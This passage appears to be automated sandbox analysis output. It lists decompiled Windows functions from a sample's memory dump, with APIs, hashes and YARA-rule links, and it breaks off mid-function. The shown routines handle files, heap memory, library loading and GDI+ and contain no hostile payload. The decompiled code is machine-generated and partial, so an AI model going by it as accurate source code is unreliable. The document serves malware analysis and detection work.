          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorFileLastPointer
          • String ID:
          • API String ID: 2976181284-0
          • Opcode ID: 7644cbfbc8ccecb8b900b1acdc2efbd4901fdb5b01d249e0f3bc489e750c451a
          • Instruction ID: 155728530210bd1f201081596beac78884e095369fe671016675b1ded47ec981
          • Opcode Fuzzy Hash: 7644cbfbc8ccecb8b900b1acdc2efbd4901fdb5b01d249e0f3bc489e750c451a
          • Instruction Fuzzy Hash: C7019E713006486BE734AF69EC88B7AB7DAAB94314F14463EB282C26C0CB75D908C621
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9903, Relevance: 3.1, APIs: 2, Instructions: 52COMMON
          Download Yara Rule
          C-Code - Quality: 94%
          			E001F9903(intOrPtr* __ecx, long _a4, long _a8, long _a12) {
				long _t14;
				void* _t17;
				intOrPtr* _t19;
				long _t21;
				void* _t23;
				long _t25;
				long _t28;
				long _t31;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0xffffffff) {
					L13:
					return 1;
				}
				_t28 = _a4;
				_t25 = _a8;
				_t31 = _t25;
				if(_t31 > 0 || _t31 >= 0 && _t28 >= 0) {
					_t21 = _a12;
				} else {
					_t21 = _a12;
					if(_t21 != 0) {
						if(_t21 != 1) {
							_t17 = E001F96E1(_t23);
						} else {
							_t17 =  *((intOrPtr*)( *_t19 + 0x14))();
						}
						_t28 = _t28 + _t17;
						asm("adc edi, edx");
						_t21 = 0;
					}
				}
				_a12 = _t25;
				_t14 = SetFilePointer( *(_t19 + 4), _t28,  &_a12, _t21); // executed
				if(_t14 != 0xffffffff || GetLastError() == 0) {
					goto L13;
				} else {
					return 0;
				}
			}











          0x001f9907
          0x001f990d
          0x001f9972
          0x00000000
          0x001f9972
          0x001f9910
          0x001f9914
          0x001f9917
          0x001f9919
          0x001f9943
          0x001f9921
          0x001f9921
          0x001f9926
          0x001f992d
          0x001f9936
          0x001f992f
          0x001f9931
          0x001f9931
          0x001f993b
          0x001f993d
          0x001f993f
          0x001f993f
          0x001f9926
          0x001f9948
          0x001f9957
          0x001f9962
          0x00000000
          0x001f996e
          0x00000000
          0x001f996e

          APIs
          • SetFilePointer.KERNELBASE(000000FF,?,?,?), ref: 001F9957
          • GetLastError.KERNEL32 ref: 001F9964
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ErrorFileLastPointer
          • String ID:
          • API String ID: 2976181284-0
          • Opcode ID: e630134cefc2b35d8f1d8656fc71a48aefb2393cacffd0a66d16ba56f4ac5b87
          • Instruction ID: 393192308e3c74c11a0202866a19c24517ff57b659f047418c2b3e36f451bfff
          • Opcode Fuzzy Hash: e630134cefc2b35d8f1d8656fc71a48aefb2393cacffd0a66d16ba56f4ac5b87
          • Instruction Fuzzy Hash: 0C01D8326001099B8F28AE699C44BBE7759BF51338707821DEB26CB251DBB0DD159661
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00217B78, Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
          Download Yara Rule
          C-Code - Quality: 96%
          			E00217B78(void* __ecx, void* __edx, void* _a4, long _a8) {
				void* __esi;
				void* _t4;
				long _t7;
				void* _t9;
				void* _t13;
				void* _t14;
				long _t16;

				_t13 = __edx;
				_t10 = __ecx;
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 = _a8;
					__eflags = _t16;
					if(_t16 != 0) {
						__eflags = _t16 - 0xffffffe0;
						if(_t16 <= 0xffffffe0) {
							while(1) {
								_t4 = RtlReAllocateHeap( *0x250874, 0, _t14, _t16); // executed
								__eflags = _t4;
								if(_t4 != 0) {
									break;
								}
								__eflags = E00217906();
								if(__eflags == 0) {
									goto L5;
								}
								_t7 = E00216763(_t10, _t13, _t16, __eflags, _t16);
								_pop(_t10);
								__eflags = _t7;
								if(_t7 == 0) {
									goto L5;
								}
							}
							L7:
							return _t4;
						}
						L5:
						 *((intOrPtr*)(E00217ECC())) = 0xc;
						L6:
						_t4 = 0;
						__eflags = 0;
						goto L7;
					}
					E00217A50(_t14);
					goto L6;
				}
				_t9 = E00217A8A(__ecx, _a8); // executed
				return _t9;
			}










          0x00217b78
          0x00217b78
          0x00217b7e
          0x00217b83
          0x00217b91
          0x00217b94
          0x00217b96
          0x00217ba1
          0x00217ba4
          0x00217bcb
          0x00217bd5
          0x00217bdb
          0x00217bdd
          0x00000000
          0x00000000
          0x00217bbc
          0x00217bbe
          0x00000000
          0x00000000
          0x00217bc1
          0x00217bc6
          0x00217bc7
          0x00217bc9
          0x00000000
          0x00000000
          0x00217bc9
          0x00217bb3
          0x00000000
          0x00217bb3
          0x00217ba6
          0x00217bab
          0x00217bb1
          0x00217bb1
          0x00217bb1
          0x00000000
          0x00217bb1
          0x00217b99
          0x00000000
          0x00217b9e
          0x00217b88
          0x00000000

          APIs
          • _free.LIBCMT ref: 00217B99
            • Part of subcall function 00217A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00212FA6,?,0000015D,?,?,?,?,00214482,000000FF,00000000,?,?), ref: 00217ABC
          • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,002300E0,001FCB18,?,?,?,?,?,?), ref: 00217BD5
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AllocateHeap$_free
          • String ID:
          • API String ID: 1482568997-0
          • Opcode ID: 216c189d9fba63a5074fd2272985c35b518a8e5a77a38918e91a0d106e87b941
          • Instruction ID: 1e5fe670b88ddd97fe230a9d7d52868ae576545259802e951cc7a1f376d201b9
          • Opcode Fuzzy Hash: 216c189d9fba63a5074fd2272985c35b518a8e5a77a38918e91a0d106e87b941
          • Instruction Fuzzy Hash: E4F0AF3153C106AA9B313E21AC45FEF37F89FF17A8B140156FC14A6190DB20DAE095A1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00200574, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00200574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









          0x00200588
          0x00200590
          0x00000000
          0x00200592
          0x00200597
          0x0020059b
          0x0020059e
          0x002005a0
          0x002005a2
          0x002005a4
          0x002005a4
          0x002005a5
          0x002005a5
          0x002005ac
          0x00000000
          0x002005ae
          0x002005b3

          APIs
          • GetCurrentProcess.KERNEL32(?,?), ref: 00200581
          • GetProcessAffinityMask.KERNEL32(00000000), ref: 00200588
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Process$AffinityCurrentMask
          • String ID:
          • API String ID: 1231390398-0
          • Opcode ID: a079b3d4fbec2d73014c9ff11a71c1dda4611d769132defcc4762223561fb101
          • Instruction ID: 52d2865e494207636473fbb4aca9016fd90bf9d578073c323ca7de15b1f4d020
          • Opcode Fuzzy Hash: a079b3d4fbec2d73014c9ff11a71c1dda4611d769132defcc4762223561fb101
          • Instruction Fuzzy Hash: 46E02B72E20306B7EF148AA49C44AAB77ADF718300F505079A902C3341F930DE154AA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FA12F, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
          Download Yara Rule
          C-Code - Quality: 82%
          			E001FA12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E0020D940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







          0x001fa137
          0x001fa13c
          0x001fa143
          0x001fa14b
          0x001fa150
          0x001fa17c
          0x001fa17c
          0x001fa185

          APIs
          • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA143
          • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,001F9F65,?,?,?,001F9DFE,?,00000001,00000000,?,?), ref: 001FA174
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: 070f0d288efe158f470c11377a2e27fbf8a2f139761656fce1f62f3cf0ad15a0
          • Instruction ID: 956041ead3e508339d465f4450b78198644afdd0c02f91eded29f6e71928c2fc
          • Opcode Fuzzy Hash: 070f0d288efe158f470c11377a2e27fbf8a2f139761656fce1f62f3cf0ad15a0
          • Instruction Fuzzy Hash: 9FF0A03114020DBBDF115FA0DC44FEA3B6CBF14381F848051BD8C86161DB32DAAAEA60
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020CB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
          Download Yara Rule
          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemText_swprintf
          • String ID:
          • API String ID: 3011073432-0
          • Opcode ID: 73923ad2c58d57114c754a3a1cc694e291aaebad5e6511bb126382bf351f9724
          • Instruction ID: 3d392ce3fa321526a5bd05d4fdcd3b838d8abe2d325579bbc9b5aa212e681109
          • Opcode Fuzzy Hash: 73923ad2c58d57114c754a3a1cc694e291aaebad5e6511bb126382bf351f9724
          • Instruction Fuzzy Hash: 0FF0E5B151834C3AEF21EBB0EC0BFA93B5D9B05741F9405A6FB05520F3E6726A305B62
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9E18, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
          Download Yara Rule
          C-Code - Quality: 82%
          			E001F9E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E0020D940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







          0x001f9e20
          0x001f9e25
          0x001f9e29
          0x001f9e31
          0x001f9e36
          0x001f9e5f
          0x001f9e5f
          0x001f9e68

          APIs
          • DeleteFileW.KERNELBASE(?,?,?,001F9648,?,?,001F94A3), ref: 001F9E29
          • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,001F9648,?,?,001F94A3), ref: 001F9E57
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DeleteFile
          • String ID:
          • API String ID: 4033686569-0
          • Opcode ID: 30ab28f4be4ec19422f62fc99b233df4e99591a13296c3ad856fcdf9d6155b6e
          • Instruction ID: abb807763355e2e7cc4a7bc87851a95a97ae5b59e8342eb2fe8a36ab12bad87c
          • Opcode Fuzzy Hash: 30ab28f4be4ec19422f62fc99b233df4e99591a13296c3ad856fcdf9d6155b6e
          • Instruction Fuzzy Hash: 53E02B3015120CB7DB11AF60DC44FF9335CAB04381F844061B948C2151DB72DD99D9A0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F9E7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001F9E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E0020D940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E001FB32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







          0x001f9e87
          0x001f9e90
          0x001f9e96
          0x001f9e9b
          0x001f9ebc
          0x001f9ec2
          0x001f9ec2
          0x001f9eca

          APIs
          • GetFileAttributesW.KERNELBASE(?,?,?,001F9E74,?,001F74F7,?,?,?,?), ref: 001F9E90
          • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001F9E74,?,001F74F7,?,?,?,?), ref: 001F9EBC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: AttributesFile
          • String ID:
          • API String ID: 3188754299-0
          • Opcode ID: c83cddf2044555e1f8711b7332ffda11545cc2fb8ddfb6d70211e9171d89137a
          • Instruction ID: fe63562bf0cfcde349469ccb85a32b6586b04fcc9ac7733d89e41829045e95e0
          • Opcode Fuzzy Hash: c83cddf2044555e1f8711b7332ffda11545cc2fb8ddfb6d70211e9171d89137a
          • Instruction Fuzzy Hash: 3BE01B3150015CB7CB21ABA4DC05BE9775CAB183E5F444161FE54D31D1D7719D59CAD0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001FFCFD, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E001FFCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E0020D940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E001FB625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





          0x001ffd05
          0x001ffd18
          0x001ffd20
          0x001ffd2e
          0x001ffd3a
          0x001ffd3a
          0x001ffd44

          APIs
          • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001FFD18
          • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001FE7F6,Crypt32.dll,?,001FE878,?,001FE85C,?,?,?,?), ref: 001FFD3A
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: DirectoryLibraryLoadSystem
          • String ID:
          • API String ID: 1175261203-0
          • Opcode ID: ecbebb430825c74a17d352095f2699128500b0158f151afb7647202866e7e00b
          • Instruction ID: b0a63e76b11204cdc502619d813fff53d140a768072942e1a3992dd1d89fb9db
          • Opcode Fuzzy Hash: ecbebb430825c74a17d352095f2699128500b0158f151afb7647202866e7e00b
          • Instruction Fuzzy Hash: 66E0127691111CBBDB219AD5DC08FEA776CEF1C391F4400A5BA48D2105DB75EA54CBA0
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0020938E, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
          Download Yara Rule
          C-Code - Quality: 73%
          			E0020938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0x223398;
				if(_a8 == 0) {
					L0020D80E(); // executed
				} else {
					L0020D814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






          0x00209391
          0x00209393
          0x00209395
          0x00209398
          0x0020939b
          0x002093a3
          0x002093a4
          0x002093a7
          0x002093ad
          0x002093b6
          0x002093af
          0x002093af
          0x002093af
          0x002093bb
          0x002093c1
          0x002093ca

          APIs
          • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 002093AF
          • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 002093B6
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: BitmapCreateFromGdipStream
          • String ID:
          • API String ID: 1918208029-0
          • Opcode ID: 8439fe8dfb1052135d350d10be0150dd19a4cc66912ff11dad88bca1853b731a
          • Instruction ID: a7d0219c2f40986f3787adc5e4528eea15373bed6cffad43e2a9e36c23e1d354
          • Opcode Fuzzy Hash: 8439fe8dfb1052135d350d10be0150dd19a4cc66912ff11dad88bca1853b731a
          • Instruction Fuzzy Hash: 28E06D71821318EBC720EF98C501699BBF8EB04320F10C09AE84593242D7B0AE649FA1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00209B08, Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E00209B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0x2375c0; // 0x7442c100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00221161, 0xffffffff);
				L0020D826(); // executed
				_t7 =  *0x22dff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}








          0x00209b19
          0x00209b20
          0x00209b2b
          0x00209b31
          0x00209b36
          0x00209b3f
          0x00209b4a

          APIs
          • GdiplusShutdown.GDIPLUS(?,?,?,00221161,000000FF), ref: 00209B31
          • OleUninitialize.OLE32(?,?,?,00221161,000000FF), ref: 00209B36
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: GdiplusShutdownUninitialize
          • String ID:
          • API String ID: 3856339756-0
          • Opcode ID: 817ef6326231a73147a9dc6c1cecf6ec43e2df9a84aef91c5ea6689bf20505bb
          • Instruction ID: a6f65206330ff8493d27f019f14ee5ebf0220931ded0f40dccaa0ed8185774dd
          • Opcode Fuzzy Hash: 817ef6326231a73147a9dc6c1cecf6ec43e2df9a84aef91c5ea6689bf20505bb
          • Instruction Fuzzy Hash: 3FE01A72958654AFC720DB88ED46B56B7A8FB09B20F004769F91A83B90DB356810CA91
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00211726, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
          Download Yara Rule
          C-Code - Quality: 89%
          			E00211726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E0021281A(__eflags, E0021166A); // executed
				 *0x22d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E002128C8(__eflags, _t1, 0x2501dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00211759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






          0x0021172b
          0x00211730
          0x00211739
          0x00211744
          0x0021174a
          0x0021174b
          0x0021174d
          0x00211758
          0x0021174f
          0x0021174f
          0x00000000
          0x0021174f
          0x0021173b
          0x0021173b
          0x0021173d
          0x0021173d

          APIs
            • Part of subcall function 0021281A: try_get_function.LIBVCRUNTIME ref: 0021282F
          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00211744
          • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0021174F
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
          • String ID:
          • API String ID: 806969131-0
          • Opcode ID: 7871a1b5dcfec8b3f4a19e75fe9b685f3f74708d271b10a069189ccfc8d2b77b
          • Instruction ID: e051d56b43987e1a4f6b17fc1d6a80a476c3622dfcb4c33585a709e701328f34
          • Opcode Fuzzy Hash: 7871a1b5dcfec8b3f4a19e75fe9b685f3f74708d271b10a069189ccfc8d2b77b
          • Instruction Fuzzy Hash: 93D0A7255B4702588D002A7078124DA57C844337703F05B45F220C62C2EB3040FBA825
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F12B2, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
          Download Yara Rule
          C-Code - Quality: 58%
          			E001F12B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




          0x001f12b9
          0x001f12ce
          0x001f12d4

          APIs
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: ItemShowWindow
          • String ID:
          • API String ID: 3351165006-0
          • Opcode ID: 2b19f6247adb3e35cc978500213cff6acff152d1ac413931f0fee01405c2437e
          • Instruction ID: 9c71c51e01bb624fa749441f4777f85d92cda80083f96d93df9069c63f3f73fb
          • Opcode Fuzzy Hash: 2b19f6247adb3e35cc978500213cff6acff152d1ac413931f0fee01405c2437e
          • Instruction Fuzzy Hash: 20C01272058200BECB011BB0ED0DD2EBBA8ABA4212F14C908F0AAC04A0C238C010DB11
          Uniqueness

          Uniqueness Score: -1.00%

          Function 001F81C4, Relevance: 1.6, APIs: 1, Instructions: 110COMMON
          Download Yara Rule
          C-Code - Quality: 91%
          			E001F81C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t47;
				signed int _t50;
				signed int _t51;
				void* _t53;
				signed int _t55;
				signed int _t61;
				intOrPtr _t73;
				signed int _t80;
				intOrPtr _t88;
				void* _t89;
				void* _t91;
				intOrPtr _t93;
				void* _t95;
				void* _t98;

				_t98 = __eflags;
				_t90 = __edi;
				_t88 = __edx;
				_t73 = __ecx;
				E0020D870(E002212D2, _t95);
				E0020D940();
				_t93 = _t73;
				_t1 = _t95 - 0x9d58; // -38232
				E001F137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
				_t6 = _t95 - 0x9d58; // -38232
				if(E001F9C0E(_t6, _t93 + 0xf4) != 0) {
					_t7 = _t95 - 0x9d58; // -38232, executed
					_t47 = E001F1973(_t7, _t88, 1); // executed
					if(_t47 != 0) {
						__eflags =  *((char*)(_t95 - 0x3093));
						if( *((char*)(_t95 - 0x3093)) == 0) {
							_push(__edi);
							_t91 = 0;
							__eflags =  *(_t95 - 0x30a3);
							if( *(_t95 - 0x30a3) != 0) {
								_t10 = _t95 - 0x9d3a; // -38202
								_t11 = _t95 - 0x1010; // -2064
								_t61 = E001FFAB1(_t11, _t10, 0x800);
								__eflags =  *(_t95 - 0x309e);
								while(1) {
									_t17 = _t95 - 0x1010; // -2064
									E001FB782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
									_t18 = _t95 - 0x2058; // -6232
									E001F6EF9(_t18);
									_push(0);
									_t19 = _t95 - 0x2058; // -6232
									_t20 = _t95 - 0x1010; // -2064
									_t61 = E001FA1B1(_t18, _t88, __eflags, _t20, _t19);
									__eflags = _t61;
									if(_t61 == 0) {
										break;
